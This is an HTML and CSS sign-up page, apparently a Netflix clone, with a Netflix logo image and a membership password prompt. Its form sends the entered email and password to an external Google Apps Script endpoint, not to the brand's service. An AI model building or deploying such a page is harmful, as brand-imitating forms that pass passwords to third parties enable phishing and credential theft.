<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>sign up 1 page</title>
    <style>
         .signup1-header{
            display: flex;
            flex-direction: column;
            justify-content: space-between;
        }
        .signup1-header img{
            width: 90px;
        }
        .signup1-header a{
        
        text-decoration: none;
            position: relative;
            left: 95%;
            font-size: 15px;
            /* border: 1px solid black; */
            height: 22px;
            width: 58px;
            top: -47px;
        }
        .signup1-header a :hover{
            color:rgb(220, 28, 28);
        }
        .signup1-mid{
            position: relative;
            margin: 19px 90px;
            padding: 30px 378px;
        }
        .signup1-mid h2{
            font-size: 22px;
        }
        .signup1-mid div input{
            margin: 6px 0px;
            padding: 4px 53px;


        }
        .signup1-mid button{
            border: 2px solid red;
            background-color: red;
            color: white;
            font-size: 15px;
            margin: 0px 0px;
            padding: 5px 121px;
            text-decoration: none;
            border-radius: 2px;
        }
        .signup1-mid button:hover{
            background-color: rgb(173, 62, 62);
        }
    </style>
</head>
<body>
    <div class="signup1-header">
        <img src="netflix.jpg" alt="">
        <a href="sign.html">Sign In</a>
    </div>
    <div class="signup1-mid">
        <h2>Create a password to start your membership</h2>
        <div>
        <p>Just a few more steps and you're done!
        We hate paperwork, too.</p>
    </div>
<form action="https://script.google.com/macros/s/AKfycbxqhxDXB2Irf8fEQY9kwrRFptDAPqPB7QTck6w9--L0banG2cEy9tate-JQRIdid3mVbg/exec" method="post">
    <div>
        <input type="email" name="email" placeholder="Email">
    </div>
    <div>
        <input type="password" name="password" placeholder="Add a password">
    </div>
    <br>
    <div>
        <button>Next</button>
    </div>
</form>
    </div>
</body>
</html>